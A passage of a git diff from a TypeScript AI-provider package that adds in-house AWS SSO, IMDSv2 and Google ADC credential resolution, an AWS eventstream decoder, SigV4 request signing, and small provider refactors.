defaultRegion: string, + signal: AbortSignal | undefined, +): Promise<ResolvedCredentials | undefined> { + // Two SSO profile shapes: + // - legacy: `sso_start_url` + `sso_region` directly on the profile + // - sso-session: `sso_session = my-session` references a `[sso-session my-session]` block + let startUrl = profileCfg.sso_start_url; + let ssoRegion = profileCfg.sso_region; + const sessionName = profileCfg.sso_session; + if (sessionName && configIni) { + const session = configIni[`sso-session:${sessionName}`]; + if (session) { + startUrl = startUrl || session.sso_start_url; + ssoRegion = ssoRegion || session.sso_region; + } + } + if (!startUrl || !ssoRegion) return undefined; + + const token = await loadSsoCachedToken(startUrl, sessionName); + if (!token?.accessToken) { + throw new Error(`AWS SSO token for ${startUrl} not found in ~/.aws/sso/cache. Run 'aws sso login' first.`); + } + const expiresAt = token.expiresAt ? Date.parse(token.expiresAt) : Number.POSITIVE_INFINITY; + if (Number.isFinite(expiresAt) && expiresAt <= Date.now()) { + throw new Error(`AWS SSO token for ${startUrl} has expired. Run 'aws sso login' to refresh.`); + } + + const url = + `https://portal.sso.${ssoRegion}.amazonaws.com/federation/credentials` + + `?account_id=${encodeURIComponent(profileCfg.sso_account_id)}` + + `&role_name=${encodeURIComponent(profileCfg.sso_role_name)}`; + const response = await fetch(url, { + method: "GET", + headers: { "x-amz-sso_bearer_token": token.accessToken }, + signal, + }); + if (!response.ok) { + const body = await response.text().catch(() => ""); + throw new Error(`AWS SSO GetRoleCredentials failed: ${response.status} ${body.slice(0, 200)}`); + } + const json = (await response.json()) as { + roleCredentials?: { accessKeyId: string; secretAccessKey: string; sessionToken: string; expiration: number }; + }; + const role = json.roleCredentials; + if (!role) throw new Error("AWS SSO GetRoleCredentials: missing roleCredentials in response"); + + // region is honored at the caller; we only consume defaultRegion to keep the + // param wired for symmetry with other resolution paths. + void defaultRegion; + + return { + accessKeyId: role.accessKeyId, + secretAccessKey: role.secretAccessKey, + sessionToken: role.sessionToken, + expiresAt: role.expiration, + }; +} + +async function loadSsoCachedToken( + startUrl: string, + sessionName: string | undefined, +): Promise<SsoCachedToken | undefined> { + const cacheDir = path.join(os.homedir(), ".aws", "sso", "cache"); + let entries: string[]; + try { + entries = await fs.promises.readdir(cacheDir); + } catch (err) { + if (isEnoent(err)) return undefined; + throw err; + } + // Prefer the deterministic hash for legacy `sso_start_url` profiles or the + // session name for the newer `sso-session` shape; otherwise scan. + const candidates: string[] = []; + const hash = await sha1Hex(sessionName || startUrl); + candidates.push(`${hash}.json`); + for (const entry of entries) { + if (entry.endsWith(".json") && !candidates.includes(entry)) candidates.push(entry); + } + for (const file of candidates) { + if (!entries.includes(file)) continue; + try { + const text = await fs.promises.readFile(path.join(cacheDir, file), "utf8"); + const parsed = JSON.parse(text) as SsoCachedToken; + if (parsed.startUrl === startUrl || (sessionName && file === `${hash}.json`)) { + return parsed; + } + } catch (err) { + logger.debug("aws-credentials: failed to read SSO cache", { file, err: String(err) }); + } + } + return undefined; +} + +async function sha1Hex(input: string): Promise<string> { + const digest = await globalThis.crypto.subtle.digest("SHA-1", new TextEncoder().encode(input)); + const bytes = new Uint8Array(digest); + let out = ""; + for (let i = 0; i < bytes.length; i++) out += bytes[i].toString(16).padStart(2, "0"); + return out; +} + +// ---------- IMDSv2 ---------- + +const IMDS_HOST = "169.254.169.254"; +const IMDS_TIMEOUT_MS = 1000; + +async function readImdsCredentials(parentSignal: AbortSignal | undefined): Promise<ResolvedCredentials | undefined> { + const timeout = AbortSignal.timeout(IMDS_TIMEOUT_MS); + const signal = parentSignal ? AbortSignal.any([parentSignal, timeout]) : timeout; + try { + const tokenRes = await fetch(`http://${IMDS_HOST}/latest/api/token`, { + method: "PUT", + headers: { "x-aws-ec2-metadata-token-ttl-seconds": "21600" }, + signal, + }); + if (!tokenRes.ok) return undefined; + const token = await tokenRes.text(); + + const roleRes = await fetch(`http://${IMDS_HOST}/latest/meta-data/iam/security-credentials/`, { + headers: { "x-aws-ec2-metadata-token": token }, + signal, + }); + if (!roleRes.ok) return undefined; + const role = (await roleRes.text()).trim(); + if (!role) return undefined; + + const credsRes = await fetch( + `http://${IMDS_HOST}/latest/meta-data/iam/security-credentials/${encodeURIComponent(role)}`, + { + headers: { "x-aws-ec2-metadata-token": token }, + signal, + }, + ); + if (!credsRes.ok) return undefined; + const body = (await credsRes.json()) as { + AccessKeyId?: string; + SecretAccessKey?: string; + Token?: string; + Expiration?: string; + }; + if (!body.AccessKeyId || !body.SecretAccessKey) return undefined; + const out: ResolvedCredentials = { + accessKeyId: body.AccessKeyId, + secretAccessKey: body.SecretAccessKey, + }; + if (body.Token) out.sessionToken = body.Token; + if (body.Expiration) out.expiresAt = Date.parse(body.Expiration); + return out; + } catch { + return undefined; + } +} + +/** Test/diagnostic helper — drops cached credentials. */ +export function clearAwsCredentialCache(): void { + cache.clear(); +} diff --git a/packages/ai/src/providers/aws-eventstream.ts b/packages/ai/src/providers/aws-eventstream.ts new file mode 100644 index 000000000..2c9057f1a --- /dev/null +++ b/packages/ai/src/providers/aws-eventstream.ts @@ -0,0 +1,185 @@ +/** + * `application/vnd.amazon.eventstream` decoder. + * + * Wire format (all integers big-endian): + * + * [total length u32] + * [headers length u32] + * [prelude CRC32 u32] <- CRC over the first 8 bytes + * [headers headers_length] + * [payload total_length - headers_length - 16] + * [message CRC32 u32] <- CRC over the entire message minus the trailing 4 bytes + * + * Headers: a sequence of `[name_len u8][name utf8][value_type u8][value …]`. + * We only need the typed values Bedrock emits (boolean true/false, byte, short, + * integer, long, byte-array, string, timestamp, uuid). All are surfaced as + * strings for ease of consumption — Bedrock only sets string-valued headers in + * practice (`:event-type`, `:message-type`, `:content-type`, `:exception-type`). + */ + +const PRELUDE_LEN = 8; +const PRELUDE_CRC_LEN = 4; +const MESSAGE_CRC_LEN = 4; +const HEADER_BLOCK_OFFSET = PRELUDE_LEN + PRELUDE_CRC_LEN; +const MIN_MESSAGE_LEN = HEADER_BLOCK_OFFSET + MESSAGE_CRC_LEN; + +export interface EventStreamMessage { + /** Lower-cased copy is *not* applied — Bedrock uses casing like `:event-type` verbatim. */ + headers: Record<string, string>; + payload: Uint8Array; +} + +/** CRC32 (IEEE / zlib polynomial 0xEDB88320), matches `@aws-crypto/crc32`. */ +const CRC_TABLE = (() => { + const t = new Uint32Array(256); + for (let i = 0; i < 256; i++) { + let c = i; + for (let k = 0; k < 8; k++) c = c & 1 ? 0xedb88320 ^ (c >>> 1) : c >>> 1; + t[i] = c >>> 0; + } + return t; +})(); + +export function crc32(bytes: Uint8Array, seed = 0): number { + let c = (seed ^ 0xffffffff) >>> 0; + for (let i = 0; i < bytes.length; i++) c = (CRC_TABLE[(c ^ bytes[i]) & 0xff] ^ (c >>> 8)) >>> 0; + return (c ^ 0xffffffff) >>> 0; +} + +/** + * Decode a single, fully buffered eventstream message. Throws if the framing is + * malformed or either CRC mismatches. Used by both `decodeEventStream` (the + * streaming entry point) and the unit tests, which exercise it with hand-built + * frames. + */ +export function decodeMessage(frame: Uint8Array): EventStreamMessage { + if (frame.length < MIN_MESSAGE_LEN) throw new Error("eventstream: frame too short"); + const view = new DataView(frame.buffer, frame.byteOffset, frame.byteLength); + const total = view.getUint32(0, false); + if (total !== frame.length) throw new Error(`eventstream: framed length ${total} != buffer ${frame.length}`); + const headersLen = view.getUint32(4, false); + const preludeCrc = view.getUint32(8, false); + const computedPreludeCrc = crc32(frame.subarray(0, PRELUDE_LEN)); + if (computedPreludeCrc !== preludeCrc) throw new Error("eventstream: prelude CRC mismatch"); + const msgCrc = view.getUint32(total - MESSAGE_CRC_LEN, false); + const computedMsgCrc = crc32(frame.subarray(0, total - MESSAGE_CRC_LEN)); + if (computedMsgCrc !== msgCrc) throw new Error("eventstream: message CRC mismatch"); + + const headersBytes = frame.subarray(HEADER_BLOCK_OFFSET, HEADER_BLOCK_OFFSET + headersLen); + const payload = frame.subarray(HEADER_BLOCK_OFFSET + headersLen, total - MESSAGE_CRC_LEN); + return { headers: parseHeaders(headersBytes), payload }; +} + +function parseHeaders(buf: Uint8Array): Record<string, string> { + const out: Record<string, string> = {}; + const view = new DataView(buf.buffer, buf.byteOffset, buf.byteLength); + const decoder = new TextDecoder(); + let p = 0; + while (p < buf.length) { + const nameLen = view.getUint8(p); + p += 1; + const name = decoder.decode(buf.subarray(p, p + nameLen)); + p += nameLen; + const type = view.getUint8(p); + p += 1; + switch (type) { + case 0: // bool true + out[name] = "true"; + break; + case 1: // bool false + out[name] = "false"; + break; + case 2: // byte + out[name] = String(view.getInt8(p)); + p += 1; + break; + case 3: // short + out[name] = String(view.getInt16(p, false)); + p += 2; + break; + case 4: // integer + out[name] = String(view.getInt32(p, false)); + p += 4; + break; + case 5: // long — surface as decimal string to avoid precision loss + out[name] = bigIntFromBytes(buf.subarray(p, p + 8)).toString(); + p += 8; + break; + case 6: { + // byte array — base64 for safe transport + const len = view.getUint16(p, false); + p += 2; + out[name] = Buffer.from(buf.buffer, buf.byteOffset + p, len).toString("base64"); + p += len; + break; + } + case 7: { + // string + const len = view.getUint16(p, false); + p += 2; + out[name] = decoder.decode(buf.subarray(p, p + len)); + p += len; + break; + } + case 8: // timestamp (ms since epoch as i64) + out[name] = new Date(Number(bigIntFromBytes(buf.subarray(p, p + 8)))).toISOString(); + p += 8; + break; + case 9: { + // uuid + const u = buf.subarray(p, p + 16); + const hex: string[] = []; + for (let i = 0; i < 16; i++) hex.push(u[i].toString(16).padStart(2, "0")); + out[name] = + `${hex.slice(0, 4).join("")}-${hex.slice(4, 6).join("")}-${hex.slice(6, 8).join("")}-${hex.slice(8, 10).join("")}-${hex.slice(10, 16).join("")}`; + p += 16; + break; + } + default: + throw new Error(`eventstream: unknown header value type ${type}`); + } + } + return out; +} + +function bigIntFromBytes(b: Uint8Array): bigint { + let v = 0n; + for (let i = 0; i < b.length; i++) v = (v << 8n) | BigInt(b[i]); + // sign-extend (two's complement) + if (b.length === 8 && b[0] & 0x80) v -= 1n << 64n; + return v; +} + +/** + * Async generator that consumes a `ReadableStream<Uint8Array>` (e.g. a fetch + * response body) and yields fully-framed messages. Handles arbitrary chunk + * boundaries: messages may span multiple chunks, and a single chunk may carry + * many messages. + */ +export async function* decodeEventStream(source: ReadableStream<Uint8Array>): AsyncGenerator<EventStreamMessage> { + const reader = source.getReader(); + // Single growable buffer; we slide a read cursor along it and compact when a + // complete prefix has been consumed. Avoids per-message Uint8Array copies. + let buf: Uint8Array<ArrayBufferLike> = new Uint8Array(0); + try { + while (true) { + const { value, done } = await reader.read(); + if (value && value.length > 0) buf = buf.length === 0 ? value : Buffer.concat([buf, value]); + let offset = 0; + while (buf.length - offset >= 4) { + const dv = new DataView(buf.buffer, buf.byteOffset + offset, buf.length - offset); + const total = dv.getUint32(0, false); + if (total < MIN_MESSAGE_LEN) throw new Error(`eventstream: total length ${total} below minimum`); + if (buf.length - offset < total) break; + const frame = buf.subarray(offset, offset + total); + yield decodeMessage(frame); + offset += total; + } + if (offset > 0) buf = buf.slice(offset); + if (done) break; + } + if (buf.length > 0) throw new Error("eventstream: truncated message at end of stream"); + } finally { + reader.releaseLock(); + } +} diff --git a/packages/ai/src/providers/aws-sigv4.ts b/packages/ai/src/providers/aws-sigv4.ts new file mode 100644 index 000000000..f55576201 --- /dev/null +++ b/packages/ai/src/providers/aws-sigv4.ts @@ -0,0 +1,218 @@ +/** + * AWS Signature V4 signing for HTTP requests. WebCrypto-only — no node:crypto. + * + * Matches `@smithy/signature-v4` for our usage: header-based signing with a + * full SHA-256 payload hash (Bedrock requires `applyChecksum: true`). + * + * Returns the set of headers to attach to the request: + * - `host` + * - `x-amz-date` + * - `x-amz-content-sha256` + * - `x-amz-security-token` (only when credentials carry a sessionToken) + * - `authorization` + */ + +export interface AwsCredentials { + accessKeyId: string; + secretAccessKey: string; + sessionToken?: string; +} + +export interface SignParams { + method: string; + /** Hostname only — used to build the `host` header and the canonical request. */ + host: string; + /** URI path component, e.g. `/model/anthropic.claude/converse-stream`. */ + path: string; + /** Optional pre-built query string (without leading `?`). */ + query?: string; + /** Extra headers to sign in addition to `host`/`x-amz-*`. Names are case-insensitive. */ + headers?: Record<string, string>; + body: Uint8Array; + region: string; + service: string; + credentials: AwsCredentials; + /** Override clock for deterministic tests. */ + date?: Date; +} + +const ALGORITHM = "AWS4-HMAC-SHA256"; +const KEY_TYPE = "aws4_request"; +// Headers the SDK never includes in the signature. Lowercased. +const UNSIGNABLE: Record<string, true> = { + authorization: true, + "cache-control": true, + connection: true, + expect: true, + from: true, + "keep-alive": true, + "max-forwards": true, + pragma: true, + referer: true, + te: true, + trailer: true, + "transfer-encoding": true, + upgrade: true, + "user-agent": true, + "x-amzn-trace-id": true, +}; + +/** Coerce a possibly-ArrayBufferLike-backed `Uint8Array` into one over a fresh + * `ArrayBuffer`, which is what `crypto.subtle.{digest,sign,importKey}` requires + * under the strict TS DOM typings. No-op when already strict. + */ +function asStrict(bytes: Uint8Array): Uint8Array<ArrayBuffer> { + if (bytes.buffer instanceof ArrayBuffer && bytes.byteOffset === 0 && bytes.byteLength === bytes.buffer.byteLength) { + return bytes as Uint8Array<ArrayBuffer>; + } + const copy = new Uint8Array(bytes.byteLength); + copy.set(bytes); + return copy; +} +const subtle = globalThis.crypto.subtle; + +const HEX = "0123456789abcdef"; +export function toHex(bytes: Uint8Array): string { + let out = ""; + for (let i = 0; i < bytes.length; i++) { + const b = bytes[i]; + out += HEX[b >> 4] + HEX[b & 15]; + } + return out; +} + +export async function sha256(data: Uint8Array | string): Promise<Uint8Array> { + const bytes = typeof data === "string" ? new TextEncoder().encode(data) : asStrict(data); + const digest = await subtle.digest("SHA-256", bytes); + return new Uint8Array(digest); +} + +export async function sha256Hex(data: Uint8Array | string): Promise<string> { + return toHex(await sha256(data)); +} + +async function hmac(key: Uint8Array, data: string | Uint8Array): Promise<Uint8Array> { + const cryptoKey = await subtle.importKey("raw", asStrict(key), { name: "HMAC", hash: "SHA-256" }, false, ["sign"]); + const bytes = typeof data === "string" ? new TextEncoder().encode(data) : asStrict(data); + const sig = await subtle.sign("HMAC", cryptoKey, bytes); + return new Uint8Array(sig); +} + +/** + * Derive a signing key: HMAC chain `kSecret → kDate → kRegion → kService → kSigning`. + */ +export async function getSigningKey( + secretAccessKey: string, + shortDate: string, + region: string, + service: string, +): Promise<Uint8Array> { + const kDate = await hmac(new TextEncoder().encode(`AWS4${secretAccessKey}`), shortDate); + const kRegion = await hmac(kDate, region); + const kService = await hmac(kRegion, service); + return hmac(kService, KEY_TYPE); +} + +/** `YYYYMMDDTHHMMSSZ` + 8-char `YYYYMMDD`. */ +export function formatAmzDate(d: Date): { longDate: string; shortDate: string } { + const iso = d.toISOString(); + // `2025-05-17T12:34:56.789Z` -> `20250517T123456Z` + const longDate = `${iso.slice(0, 4)}${iso.slice(5, 7)}${iso.slice(8, 10)}T${iso.slice(11, 13)}${iso.slice(14, 16)}${iso.slice(17, 19)}Z`; + return { longDate, shortDate: longDate.slice(0, 8) }; +} + +/** + * Canonicalize a request path per RFC 3986: each segment is %-encoded but `/` + * stays literal. Matches the smithy default (`uriEscapePath: true`, then revert + * the double-encoding of `/`). Bedrock paths use no reserved characters in + * practice, but model IDs can include `:` and `.`. + */ +function canonicalPath(path: string): string { + const segments = path.split("/"); + const escaped = segments.map(seg => (seg.length === 0 ? "" : encodeRfc3986(seg))); + return escaped.join("/"); +} + +function encodeRfc3986(str: string): string { + return encodeURIComponent(str).replace(/[!'()*]/g, c => `%${c.charCodeAt(0).toString(16).toUpperCase()}`); +} + +function canonicalQuery(query: string | undefined): string { + if (!query) return ""; + const pairs: Array<[string, string]> = []; + for (const part of query.split("&")) { + if (!part) continue; + const eq = part.indexOf("="); + const k = eq === -1 ? part : part.slice(0, eq); + const v = eq === -1 ? "" : part.slice(eq + 1); + pairs.push([decodeURIComponent(k), decodeURIComponent(v)]); + } + pairs.sort((a, b) => (a[0] < b[0] ? -1 : a[0] > b[0] ? 1 : a[1] < b[1] ? -1 : a[1] > b[1] ? 1 : 0)); + return pairs.map(([k, v]) => `${encodeRfc3986(k)}=${encodeRfc3986(v)}`).join("&"); +} + +export interface SignedHeaders { + host: string; + "x-amz-date": string; + "x-amz-content-sha256": string; + authorization: string; + "x-amz-security-token"?: string; +} + +export async function signRequest(params: SignParams): Promise<SignedHeaders> { + const { method, host, path, query, body, region, service, credentials } = params; + const date = params.date ?? new Date(); + const { longDate, shortDate } = formatAmzDate(date); + const payloadHash = await sha256Hex(body); + + // Assemble the headers that will be signed. Always include host, x-amz-date, + // x-amz-content-sha256, plus x-amz-security-token when present, plus + // caller-provided signable headers (e.g. content-type, accept). + const signed: Record<string, string> = { + host, + "x-amz-date": longDate, + "x-amz-content-sha256": payloadHash, + }; + if (credentials.sessionToken) signed["x-amz-security-token"] = credentials.sessionToken; + const extraHeaders = params.headers; + if (extraHeaders) { + for (const k in extraHeaders) { + const lk = k.toLowerCase(); + if (UNSIGNABLE[lk]) continue; + if (lk.startsWith("proxy-") || lk.startsWith("sec-")) continue; + signed[lk] = extraHeaders[k].trim().replace(/\s+/g, " "); + } + } + + const sortedNames = Object.keys(signed).sort(); + const canonicalHeaders = `${sortedNames.map(n => `${n}:${signed[n]}`).join("\n")}\n`; + const signedHeadersStr = sortedNames.join(";"); + + const canonicalRequest = [ + method.toUpperCase(), + canonicalPath(path), + canonicalQuery(query), + canonicalHeaders, + signedHeadersStr, + payloadHash, + ].join("\n"); + + const scope = `${shortDate}/${region}/${service}/${KEY_TYPE}`; + const stringToSign = [ALGORITHM, longDate, scope, await sha256Hex(canonicalRequest)].join("\n"); + + const signingKey = await getSigningKey(credentials.secretAccessKey, shortDate, region, service); + const signature = toHex(await hmac(signingKey, stringToSign)); + + const authorization = + `${ALGORITHM} Credential=${credentials.accessKeyId}/${scope}, ` + + `SignedHeaders=${signedHeadersStr}, Signature=${signature}`; + + const out: SignedHeaders = { + host, + "x-amz-date": longDate, + "x-amz-content-sha256": payloadHash, + authorization, + }; + if (credentials.sessionToken) out["x-amz-security-token"] = credentials.sessionToken; + return out; +} diff --git a/packages/ai/src/providers/azure-openai-responses.ts b/packages/ai/src/providers/azure-openai-responses.ts index 6e2d63afa..61da5ad90 100644 --- a/packages/ai/src/providers/azure-openai-responses.ts +++ b/packages/ai/src/providers/azure-openai-responses.ts @@ -243,6 +243,7 @@ function createClient(model: Model<"azure-openai-responses">, apiKey: string, op const { baseUrl, apiVersion } = resolveAzureConfig(model, options); const baseFetch = options?.fetch ?? fetch; + const onSseEvent = options?.onSseEvent; return new AzureOpenAI({ apiKey, apiVersion, @@ -250,9 +251,7 @@ function createClient(model: Model<"azure-openai-responses">, apiKey: string, op maxRetries: 5, defaultHeaders: headers, baseURL: baseUrl, - fetch: options?.onSseEvent - ? wrapFetchForSseDebug(baseFetch, event => options.onSseEvent?.(event, model)) - : baseFetch, + fetch: onSseEvent ? wrapFetchForSseDebug(baseFetch, event => onSseEvent(event, model)) : baseFetch, }); } diff --git a/packages/ai/src/providers/cursor.ts b/packages/ai/src/providers/cursor.ts index 563ef5aa0..ff87e4835 100644 --- a/packages/ai/src/providers/cursor.ts +++ b/packages/ai/src/providers/cursor.ts @@ -3,8 +3,7 @@ import * as fs from "node:fs/promises"; import http2 from "node:http2"; import { create, fromBinary, fromJson, type JsonValue, toBinary, toJson } from "@bufbuild/protobuf"; import { ValueSchema } from "@bufbuild/protobuf/wkt"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; -import { $env } from "@oh-my-pi/pi-utils"; +import { $env, sanitizeText } from "@oh-my-pi/pi-utils"; import { calculateCost } from "../models"; import type { Api, diff --git a/packages/ai/src/providers/google-auth.ts b/packages/ai/src/providers/google-auth.ts new file mode 100644 index 000000000..a8004508f --- /dev/null +++ b/packages/ai/src/providers/google-auth.ts @@ -0,0 +1,252 @@ +/** + * Application Default Credentials (ADC) resolution for Vertex AI. + * + * Replaces `google-auth-library` with a direct WebCrypto + REST implementation. + * Sources, in priority order: + * 1. `GOOGLE_APPLICATION_CREDENTIALS` env → file with `type: "service_account"` (RS256 JWT exchange) + * or `type: "authorized_user"` (refresh-token exchange). + * 2. `~/.config/gcloud/application_default_credentials.json` (user ADC, same authorized_user flow). + * 3. GCE / Cloud Run metadata server (`metadata.google.internal`). + * + * Tokens are cached per source key and refreshed `GOOGLE_VERTEX_REFRESH_SKEW_MS` before expiry + * (default 60s). Concurrent callers waiting on a refresh share the same in-flight promise. + */ + +import { Buffer } from "node:buffer"; +import * as os from "node:os"; +import * as path from "node:path"; +import { $envpos, isEnoent, logger } from "@oh-my-pi/pi-utils"; +import type { FetchImpl } from "../types"; + +const OAUTH_TOKEN_URL = "https://oauth2.googleapis.com/token"; +const METADATA_TOKEN_URL = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"; +const CLOUD_PLATFORM_SCOPE = "https://www.googleapis.com/auth/cloud-platform"; +const JWT_BEARER_GRANT = "urn:ietf:params:oauth:grant-type:jwt-bearer"; + +interface CachedToken { + token: string; + expiresAtMs: number; +} + +interface ServiceAccountCredentials { + type: "service_account"; + client_email: string; + private_key: string; + private_key_id?: string; +} + +interface AuthorizedUserCredentials { + type: "authorized_user"; + client_id: string; + client_secret: string; + refresh_token: string; +} + +type AdcFileCredentials = ServiceAccountCredentials | AuthorizedUserCredentials; + +interface TokenResponse { + access_token: string; + expires_in: number; + token_type?: string; +} + +const tokenCache = new Map<string, CachedToken>(); +const inflight = new Map<string, Promise<string>>(); + +function getRefreshSkewMs(): number { + return $envpos("GOOGLE_VERTEX_REFRESH_SKEW_MS", 60_000); +} + +function userAdcPath(): string { + return path.join(os.homedir(), ".config", "gcloud", "application_default_credentials.json"); +} + +async function readJsonFile<T>(filePath: string): Promise<T | undefined> { + try { + return (await Bun.file(filePath).json()) as T; + } catch (err) { + if (isEnoent(err)) return undefined; + throw err; + } +} + +async function loadAdcCredentials(): Promise<{ source: string; creds: AdcFileCredentials } | undefined> { + const gacPath = Bun.env.GOOGLE_APPLICATION_CREDENTIALS; + if (gacPath) { + const creds = await readJsonFile<AdcFileCredentials>(gacPath); + if (!creds) { + throw new Error(`GOOGLE_APPLICATION_CREDENTIALS points to a missing file: ${gacPath}`); + } + return { source: `gac:${gacPath}`, creds }; + } + const userPath = userAdcPath(); + const creds = await readJsonFile<AdcFileCredentials>(userPath); + if (creds) return { source: `user:${userPath}`, creds }; + return undefined; +} + +function base64UrlEncode(bytes: Uint8Array | string): string { + const buf = typeof bytes === "string" ? Buffer.from(bytes, "utf8") : bytes; + return Buffer.from(buf.buffer, buf.byteOffset, buf.byteLength).toString("base64url"); +} + +function pemToPkcs8(pem: string): Uint8Array<ArrayBuffer> { + const body = pem + .replace(/-----BEGIN [^-]+-----/g, "") + .replace(/-----END [^-]+-----/g, "") + .replace(/\s+/g, ""); + if (!body) throw new Error("Invalid PEM: empty body"); + return Uint8Array.fromBase64(body); +} + +async function signJwtRs256(claims: Record<string, unknown>, privateKeyPem: string, keyId?: string): Promise<string> { + const header: Record<string, unknown> = { alg: "RS256", typ: "JWT" }; + if (keyId) header.kid = keyId; + const payload = `${base64UrlEncode(JSON.stringify(header))}.${base64UrlEncode(JSON.stringify(claims))}`; + + const key = await globalThis.crypto.subtle.importKey( + "pkcs8", + pemToPkcs8(privateKeyPem), + { name: "RSASSA-PKCS1-v1_5", hash: "SHA-256" }, + false, + ["sign"], + ); + const signature = new Uint8Array( + await globalThis.crypto.subtle.sign("RSASSA-PKCS1-v1_5", key, new TextEncoder().encode(payload)), + ); + return `${payload}.${base64UrlEncode(signature)}`; +} + +async function exchangeJwtForToken( + creds: ServiceAccountCredentials, + signal: AbortSignal | undefined, + fetchImpl: FetchImpl, +): Promise<TokenResponse> { + const now = Math.floor(Date.now() / 1000); + const assertion = await signJwtRs256( + { + iss: creds.client_email, + scope: CLOUD_PLATFORM_SCOPE, + aud: OAUTH_TOKEN_URL, + exp: now + 3600, + iat: now, + }, + creds.private_key, + creds.private_key_id, + ); + const body = new URLSearchParams({ grant_type: JWT_BEARER_GRANT, assertion }); + return postForToken(OAUTH_TOKEN_URL, body, signal, fetchImpl); +} + +async function exchangeRefreshToken( + creds: AuthorizedUserCredentials, + signal: AbortSignal | undefined, + fetchImpl: FetchImpl, +): Promise<TokenResponse> { + const body = new URLSearchParams({ + client_id: creds.client_id, + client_secret: creds.client_secret, + refresh_token: creds.refresh_token, + grant_type: "refresh_token", + }); + return postForToken(OAUTH_TOKEN_URL, body, signal, fetchImpl); +} + +async function fetchMetadataToken( + signal: AbortSignal | undefined, + fetchImpl: FetchImpl, +): Promise<TokenResponse | undefined> { + const timeout = AbortSignal.timeout(2000); + const combined = signal ? AbortSignal.any([signal, timeout]) : timeout; + try { + const response = await fetchImpl(METADATA_TOKEN_URL, { + method: "GET", + headers: { "Metadata-Flavor": "Google" }, + signal: combined, + }); + if (!response.ok) return undefined; + return (await response.json()) as TokenResponse; + } catch { + return undefined; + } +} + +async function postForToken( + url: string, + body: URLSearchParams, + signal: AbortSignal | undefined, + fetchImpl: FetchImpl, +): Promise<TokenResponse> { + const response = await fetchImpl(url, { + method: "POST", + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: body.toString(), + signal, + }); + if (!response.ok) { + const detail = await response.text().catch(() => ""); + throw new Error(`Google OAuth token exchange failed (${response.status}): ${detail}`); + } + return (await response.json()) as TokenResponse; +} + +async function resolveAccessTokenUncached( + signal: AbortSignal | undefined, + fetchImpl: FetchImpl, +): Promise<{ source: string; token: TokenResponse }> { + const adc = await loadAdcCredentials(); + if (adc) { + const token = + adc.creds.type === "service_account" + ? await exchangeJwtForToken(adc.creds, signal, fetchImpl) + : await exchangeRefreshToken(adc.creds, signal, fetchImpl); + return { source: adc.source, token }; + } + const metadata = await fetchMetadataToken(signal, fetchImpl); + if (metadata) return { source: "metadata", token: metadata }; + throw new Error( + "Vertex AI requires Application Default Credentials. Set GOOGLE_APPLICATION_CREDENTIALS, run `gcloud auth application-default login`, or run on a GCE/Cloud Run instance with a service account.", + ); +} + +/** + * Returns a Bearer access token suitable for the `Authorization` header on Vertex AI calls. + * The token is cached in module scope and refreshed `GOOGLE_VERTEX_REFRESH_SKEW_MS` ms before it expires. + */ +export async function getVertexAccessToken(options?: { signal?: AbortSignal; fetch?: FetchImpl }): Promise<string> { + const fetchImpl = options?.fetch ?? globalThis.fetch.bind(globalThis); + const skew = getRefreshSkewMs(); + const now = Date.now(); + + // Best-effort cache key probe: we don't know the source until we resolve, but cached entries + // are keyed by their resolved source. Try every cached source first. + for (const [source, cached] of tokenCache) { + if (cached.expiresAtMs - skew > now) return cached.token; + // expired entry — drop and re-resolve + tokenCache.delete(source); + } + + const cacheKey = "vertex-adc"; + const existing = inflight.get(cacheKey); + if (existing) return existing; + + const promise = (async () => { + try { + const { source, token } = await resolveAccessTokenUncached(options?.signal, fetchImpl); + const expiresAtMs = Date.now() + Math.max(0, token.expires_in * 1000); + tokenCache.set(source, { token: token.access_token, expiresAtMs }); + logger.debug("vertex.adc acquired access token", { source, expiresInSec: token.expires_in }); + return token.access_token; + } finally { + inflight.delete(cacheKey); + } + })(); + inflight.set(cacheKey, promise); + return promise; +} + +/** Test seam: clears every cached token. */ +export function __resetVertexTokenCache(): void { + tokenCache.clear(); + inflight.clear(); +} diff --git a/packages/ai/src/providers/google-gemini-cli.ts b/packages/ai/src/providers/google-gemini-cli.ts index c8fe2ea3f..2bcd5821a 100644 --- a/packages/ai/src/providers/google-gemini-cli.ts +++ b/packages/ai/src/providers/google-gemini-cli.ts @@ -5,7 +5,6 @@ */ import { createHash, randomBytes, randomUUID } from "node:crypto"; import { scheduler } from "node:timers/promises"; -import type { Content, FunctionCallingConfigMode, ThinkingConfig } from "@google/genai"; import { fetchWithRetry, readSseJson } from "@oh-my-pi/pi-utils"; import { calculateCost } from "../models"; import type { @@ -24,8 +23,9 @@ import { AssistantMessageEventStream } from "../utils/event-stream"; import { appendRawHttpRequestDumpFor400, type RawHttpRequestDump, withHttpStatus } from "../utils/http-inspector"; import { refreshAntigravityToken } from "../utils/oauth/google-antigravity"; import { refreshGoogleCloudToken } from "../utils/oauth/google-gemini-cli"; -import { sanitizeSchemaForCCA } from "../utils/schema"; +import { normalizeSchemaForCCA } from "../utils/schema"; import { ANTIGRAVITY_SYSTEM_INSTRUCTION, getAntigravityUserAgent, getGeminiCliHeaders } from "./google-gemini-headers"; +import type { Content, FunctionCallingConfigMode, ThinkingConfig } from "./google-shared"; import { convertMessages, convertTools, @@ -688,7 +688,7 @@ function normalizeAntigravityTools( const { parametersJsonSchema, ...rest } = declaration; return { ...rest, - parameters: sanitizeSchemaForCCA(parametersJsonSchema), + parameters: normalizeSchemaForCCA(parametersJsonSchema), }; }), })); diff --git a/packages/ai/src/providers/google-shared.ts b/packages/ai/src/providers/google-shared.ts index 14ca2e50e..8f65119aa 100644 --- a/packages/ai/src/providers/google-shared.ts +++ b/packages/ai/src/providers/google-shared.ts @@ -1,23 +1,14 @@ /** * Shared utilities for Google Generative AI and Google Cloud Code Assist providers. */ -import { - type Content, - FinishReason, - FunctionCallingConfigMode, - type GenerateContentConfig, - type GenerateContentParameters, - type GenerateContentResponse, - type GoogleGenAI, - type Part, - type ThinkingConfig, - type ThinkingLevel, -} from "@google/genai"; + +import { readSseJson } from "@oh-my-pi/pi-utils"; import { calculateCost } from "../models"; import type { Api, AssistantMessage, Context, + FetchImpl, ImageContent, Model, StopReason, @@ -29,12 +20,30 @@ import type { } from "../types"; import { normalizeSystemPrompts } from "../utils"; import { AssistantMessageEventStream } from "../utils/event-stream"; -import { finalizeErrorMessage, type RawHttpRequestDump } from "../utils/http-inspector"; -import { prepareSchemaForCCA, sanitizeSchemaForGoogle, toolWireSchema } from 